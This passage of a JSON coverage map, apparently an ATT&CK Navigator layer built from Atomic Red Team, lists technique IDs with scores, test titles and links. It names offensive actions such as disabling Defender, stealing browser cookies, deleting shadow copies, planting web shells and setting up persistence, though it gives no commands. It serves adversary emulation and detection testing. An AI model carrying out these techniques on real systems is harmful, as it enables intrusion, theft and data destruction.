Registry\n- Disable Win Defender Notification\n- Disable Windows OS Auto Update\n- Disable Windows Auto Reboot for current logon user\n- Windows Auto Update Option to Notify before download\n- Do Not Connect To Win Update\n- Tamper Win Defender Protection\n- Snake Malware Registry Blob\n- Allow Simultaneous Download Registry\n- Modify Internet Zone Protocol Defaults in Current User Registry - cmd\n- Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell\n- Activities To Disable Secondary Authentication Detected By Modified Registry Value.\n- Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.\n- Scarab Ransomware Defense Evasion Activities\n- Disable Remote Desktop Anti-Alias Setting Through Registry\n- Disable Remote Desktop Security Settings Through Registry\n- Disabling ShowUI Settings of Windows Error Reporting (WER)\n- Enable Proxy Settings\n- Set-Up Proxy Server\n- RDP Authentication Level Override\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":2,"enabled":true,"comment":"\n- Windows Screencapture\n- Windows Screen Capture (CopyFromScreen)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"comment":"\n- Email Collection with PowerShell Get-Inbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1115","score":3,"enabled":true,"comment":"\n- Utilize Clipboard to store or execute commands from\n- Execute Commands from Clipboard using PowerShell\n- Collect Clipboard Data via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"comment":"\n- Automated Collection Command Prompt\n- Automated Collection PowerShell\n- Recon information for export with PowerShell\n- Recon information for export with Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"comment":"\n- Win32_PnPEntity Hardware Inventory\n- WinPwn - printercheck\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":2,"enabled":true,"comment":"\n- using device audio capture commandlet\n- Registry artefact when application use microphone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":4,"enabled":true,"comment":"\n- System Time Discovery\n- System Time Discovery - PowerShell\n- System Time Discovery W32tm as a Delay\n- System Time with Windows time Command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"comment":"\n- Registry artefact when application use webcam\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}],"comment":"\n- Lolbin Jsc.exe compile javascript to exe\n- Lolbin Jsc.exe compile javascript to dll\n"},{"techniqueID":"T1127.001","score":2,"enabled":true,"comment":"\n- MSBuild Bypass Using Inline Tasks (C#)\n- MSBuild Bypass Using Inline Tasks (VB)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1129","score":1,"enabled":true,"comment":"\n- ESXi - Install a custom VIB on an ESXi host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1129/T1129.md"}]},{"techniqueID":"T1132","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":1,"enabled":true,"comment":"\n- XOR Encoded data.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"comment":"\n- Running Chrome VPN Extensions via the Registry 2 vpn extension\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"comment":"\n- Named pipe client impersonation\n- `SeDebugPrivilege` token duplication\n- Launch NSudo Executable\n- Bad Potato\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"comment":"\n- Access Token Manipulation\n- WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"comment":"\n- Parent PID Spoofing using PowerShell\n- Parent PID Spoofing - Spawn from Current Process\n- Parent PID Spoofing - Spawn from Specified Process\n- Parent PID Spoofing - Spawn from svchost.exe\n- Parent PID Spoofing - Spawn from New Process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"comment":"\n- Injection SID-History with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":7,"enabled":true,"comment":"\n- Network Share Discovery command prompt\n- Network Share Discovery PowerShell\n- View available share drives\n- Share Discovery with PowerView\n- PowerView ShareFinder\n- WinPwn - shareenumeration\n- Network Share Discovery via dir command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":4,"enabled":true,"comment":"\n- Create a new user in a command prompt\n- Create a new user in PowerShell\n- Create a new Windows admin user\n- Create a new Windows admin user via .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":3,"enabled":true,"comment":"\n- Create a new Windows domain admin user\n- Create a new account similar to ANONYMOUS LOGON\n- Create a new Domain Account using PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1137","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}],"comment":"\n- Office Application Startup - Outlook as a C2\n"},{"techniqueID":"T1137.001","score":1,"enabled":true,"comment":"\n- Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.001/T1137.001.md"}]},{"techniqueID":"T1137.002","score":1,"enabled":true,"comment":"\n- Office Application Startup Test Persistence (HKCU)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"comment":"\n- Install Outlook Home Page Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"comment":"\n- Code Executed Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Word Add-in File (WLL)\n- Persistent Code Execution Via Excel VBA Add-in File (XLAM)\n- Persistent Code Execution Via PowerPoint VBA Add-in File (PPAM)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":2,"enabled":true,"comment":"\n- Deobfuscate/Decode Files Or Information\n- Certutil Rename and Decode\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"comment":"\n- Chrome/Chromium (Developer Mode)\n- Chrome/Chromium (Chrome Web Store)\n- Firefox\n- Edge Chromium Addon - VPN\n- Google Chrome Load Unpacked Extension With Command Line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"comment":"\n- PetitPotam\n- WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"comment":"\n- Octopus Scanner Malware Open Source Supply Chain\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"comment":"\n- Bitsadmin Download (cmd)\n- Bitsadmin Download (PowerShell)\n- Persist, Download, & Execute\n- Bits download using desktopimgdownldr.exe (cmd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":5,"enabled":true,"comment":"\n- Examine local password policy - Windows\n- Examine domain password policy - Windows\n- Get-DomainPolicy with PowerView\n- Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy\n- Use of SecEdit.exe to export the local security policy (including the password policy)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"comment":"\n- Indirect Command Execution - pcalua.exe\n- Indirect Command Execution - forfiles.exe\n- Indirect Command Execution - conhost.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"comment":"\n- OSTap Style Macro Execution\n- OSTap Payload Download\n- Maldoc choice flags command execution\n- OSTAP JS version\n- Office launching .bat file from AppData\n- Excel 4 Macro\n- Headless Chrome code execution via VBA\n- Potentially Unwanted Applications (PUA)\n- Office Generic Payload Download\n- LNK Payload Download\n- Mirror Blast Emulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"comment":"\n- Malicious Execution from Mounted ISO Image\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"comment":"\n- DCShadow (Active Directory)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}],"comment":"\n- SyncAppvPublishingServer Signed Script PowerShell Command Execution\n- manage-bde.wsf Signed Script Command Execution\n"},{"techniqueID":"T1216.001","score":1,"enabled":true,"comment":"\n- PubPrn.vbs Signed Script Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":4,"enabled":true,"comment":"\n- List Google Chrome / Opera Bookmarks on Windows with powershell\n- List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt\n- List Mozilla Firefox bookmarks on Windows with command prompt\n- List Internet Explorer Bookmarks using the command prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":78,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}],"comment":"\n- mavinject - Inject DLL into running process\n- Register-CimProvider - Execute evil dll\n- InfDefaultInstall.exe .inf Execution\n- ProtocolHandler.exe Downloaded a Suspicious File\n- Microsoft.Workflow.Compiler.exe Payload Execution\n- Renamed Microsoft.Workflow.Compiler.exe Payload Executions\n- Invoke-ATHRemoteFXvGPUDisablementCommand base test\n- DiskShadow Command Execution\n- Load Arbitrary DLL via Wuauclt (Windows Update Client)\n- Lolbin Gpscript logon option\n- Lolbin Gpscript startup option\n- Lolbas ie4uinit.exe use as proxy\n- LOLBAS CustomShellHost to Spawn Process\n- Provlaunch.exe Executes Arbitrary Command via Registry Key\n- LOLBAS Msedge to Spawn Process\n"},{"techniqueID":"T1218.001","score":8,"enabled":true,"comment":"\n- Compiled HTML Help Local Payload\n- Compiled HTML Help Remote Payload\n- Invoke CHM with default Shortcut Command Execution\n- Invoke CHM with InfoTech Storage Protocol Handler\n- Invoke CHM Simulate Double click\n- Invoke CHM with Script Engine and Help Topic\n- Invoke CHM Shortcut Command with ITS and Help Topic\n- Decompile Local CHM File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"comment":"\n- Control Panel Items\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"comment":"\n- CMSTP Executing Remote Scriptlet\n- CMSTP Executing UAC Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"comment":"\n- CheckIfInstallable method call\n- InstallHelper method call\n- InstallUtil class constructor method call\n- InstallUtil Install method call\n- InstallUtil Uninstall method call - /U variant\n- InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant\n- InstallUtil HelpText method call\n- InstallUtil evasive invocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"comment":"\n- Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject\n- Mshta executes VBScript to execute malicious command\n- Mshta Executes Remote HTML Application (HTA)\n- Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement\n- Invoke HTML Application - Jscript Engine Simulating Double Click\n- Invoke HTML Application - Direct download from URI\n- Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler\n- Invoke HTML Application - JScript Engine with Inline Protocol Handler\n- Invoke HTML Application - Simulate Lateral Movement over UNC Path\n- Mshta used to Execute PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"comment":"\n- Msiexec.exe - Execute Local MSI file with embedded JScript\n- Msiexec.exe - Execute Local MSI file with embedded VBScript\n- Msiexec.exe - Execute Local MSI file with an embedded DLL\n- Msiexec.exe - Execute Local MSI file with an embedded EXE\n- WMI Win32_Product Class - Execute Local MSI file with embedded JScript\n- WMI Win32_Product Class - Execute Local MSI file with embedded VBScript\n- WMI Win32_Product Class - Execute Local MSI file with an embedded DLL\n- WMI Win32_Product Class - Execute Local MSI file with an embedded EXE\n- Msiexec.exe - Execute the DllRegisterServer function of a DLL\n- Msiexec.exe - Execute the DllUnregisterServer function of a DLL\n- Msiexec.exe - Execute Remote MSI file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"comment":"\n- Odbcconf.exe - Execute Arbitrary DLL\n- Odbcconf.exe - Load Response File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"comment":"\n- Regasm Uninstall Method Call Test\n- Regsvcs Uninstall Method Call Test\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"comment":"\n- Regsvr32 local COM scriptlet execution\n- Regsvr32 remote COM scriptlet execution\n- Regsvr32 local DLL execution\n- Regsvr32 Registering Non DLL\n- Regsvr32 Silent DLL Install Call DllRegisterServer\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":14,"enabled":true,"comment":"\n- Rundll32 execute JavaScript Remote Payload With GetObject\n- Rundll32 execute VBscript command\n- Rundll32 execute VBscript command using Ordinal number\n- Rundll32 advpack.dll Execution\n- Rundll32 ieadvpack.dll Execution\n- Rundll32 syssetup.dll Execution\n- Rundll32 setupapi.dll Execution\n- Execution of HTA and VBS Files using Rundll32 and URL.dll\n- Launches an executable using Rundll32 and pcwutl.dll\n- Execution of non-dll using rundll32.exe\n- Rundll32 with Ordinal Value\n- Rundll32 with Control_RunDLL\n- Rundll32 with desk.cpl\n- Running DLL with .init extension and function\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":11,"enabled":true,"comment":"\n- TeamViewer Files Detected Test on Windows\n- AnyDesk Files Detected Test on Windows\n- LogMeIn Files Detected Test on Windows\n- GoToAssist Files Detected Test on Windows\n- ScreenConnect Application Download and Install on Windows\n- Ammyy Admin Software Execution\n- RemotePC Software Execution\n- NetSupport - RAT Execution\n- UltraViewer - RAT Execution\n- UltraVNC Execution\n- MSP360 Connect Execution\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"comment":"\n- MSXSL Bypass using local files\n- MSXSL Bypass using remote files\n- WMIC bypass using local XSL file\n- WMIC bypass using remote XSL file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"comment":"\n- WINWORD Remote Template Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"comment":"\n- Take ownership using takeown utility\n- cacls - Grant permission to specified user or group recursively\n- attrib - Remove read-only attribute\n- attrib - hide file\n- Grant Full Access to folder for Everyone - Ryuk Ransomware Style\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"comment":"\n- Windows - Discover domain trusts with dsquery\n- Windows - Discover domain trusts with nltest\n- Powershell enumerate domains and forests\n- Adfind - Enumerate Active Directory OUs\n- Adfind - Enumerate Active Directory Trusts\n- Get-DomainTrust with PowerView\n- Get-ForestTrust with PowerView\n- TruffleSnout - Listing AD Infrastructure\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"comment":"\n- LockBit Black - Modify Group policy settings -cmd\n- LockBit Black - Modify Group policy settings -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1485","score":2,"enabled":true,"comment":"\n- Windows - Overwrite file with SysInternals SDelete\n- Overwrite deleted data on C drive\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":3,"enabled":true,"comment":"\n- PureLocker Ransom Note\n- Data Encrypted with GPG4Win\n- Data Encrypt Using DiskCryptor\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"comment":"\n- Windows - Stop service using Service Controller\n- Windows - Stop service using net.exe\n- Windows - Stop service by killing process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":11,"enabled":true,"comment":"\n- Windows - Delete Volume Shadow Copies\n- Windows - Delete Volume Shadow Copies via WMI\n- Windows - wbadmin Delete Windows Backup Catalog\n- Windows - Disable Windows Recovery Console Repair\n- Windows - Delete Volume Shadow Copies via WMI with PowerShell\n- Windows - Delete Backup Files\n- Windows - wbadmin Delete systemstatebackup\n- Windows - Disable the SR scheduled task\n- Disable System Restore Through Registry\n- Windows - vssadmin Resize Shadowstorage Volume\n- Modify VSS Service Permissions\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"comment":"\n- Replace Desktop Wallpaper\n- Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1497","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":2,"enabled":true,"comment":"\n- Detect Virtualization Environment (Windows)\n- Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"comment":"\n- Install MS Exchange Transport Agent Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"comment":"\n- Web Shell Written to Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"comment":"\n- Install IIS Module using AppCmd.exe\n- Install IIS Module using PowerShell Cmdlet New-WebGlobalModule\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"comment":"\n- Simulate Patching termsrv.dll\n- Modify Terminal Services DLL Path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}],"comment":"\n- Find and Display Internet Explorer Browser Version\n- Applications Installed\n- WinPwn - Dotnetsearch\n- WinPwn - DotNet\n- WinPwn - powerSQL\n"},{"techniqueID":"T1518.001","score":7,"enabled":true,"comment":"\n- Security Software Discovery\n- Security Software Discovery - powershell\n- Security Software Discovery - Sysmon Service\n- Security Software Discovery - AV Discovery via WMI\n- Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets\n- Security Software Discovery - Windows Defender Enumeration\n- Security Software Discovery - Windows Firewall Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":3,"enabled":true,"comment":"\n- Shutdown System - Windows\n- Restart System - Windows\n- Logoff System - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":3,"enabled":true,"comment":"\n- Change User Password - Windows\n- Delete User - Windows\n- Remove Account From Domain Admin Group\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":2,"enabled":true,"comment":"\n- Steal Firefox Cookies (Windows)\n- Steal Chrome Cookies (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.003","score":6,"enabled":true,"comment":"\n- Modify Fax service to run PowerShell\n- Service Installation CMD\n- Service Installation PowerShell\n- TinyTurla backdoor service w64time\n- Remote Service Installation CMD\n- Modify Service to Run Arbitrary Binary (Powershell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1546","score":27,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}],"comment":"\n- Persistence with Custom AutodialDLL\n- HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)\n- HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation)\n- WMI Invoke-CimMethod Start Process\n"},{"techniqueID":"T1546.001","score":1,"enabled":true,"comment":"\n- Change Default File Association\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"comment":"\n- Set Arbitrary Binary as Screensaver\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"comment":"\n- Persistence via WMI Event Subscription - CommandLineEventConsumer\n- Persistence via WMI Event Subscription - ActiveScriptEventConsumer\n- Windows MOFComp.exe Load MOF File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"comment":"\n- Netsh Helper DLL Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":4,"enabled":true,"comment":"\n- Attaches Command Prompt as a Debugger to a List of Target Processes\n- Replace binary of sticky keys\n- Create Symbolic Link From osk.exe to cmd.exe\n- Atbroker.exe (AT) Executes Arbitrary Command via Registry Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"comment":"\n- Create registry persistence via AppCert DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"comment":"\n- Install AppInit Shim\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"comment":"\n- Application Shim Installation\n- New shim database files created in the default shim database directory\n- Registry key creation and/or modification events for SDB\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"comment":"\n- IFEO Add Debugger\n- IFEO Global Flags\n- GlobalFlags in Image File Execution Options\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"comment":"\n- Append malicious start-process cmdlet\n","links":[{"label":"View 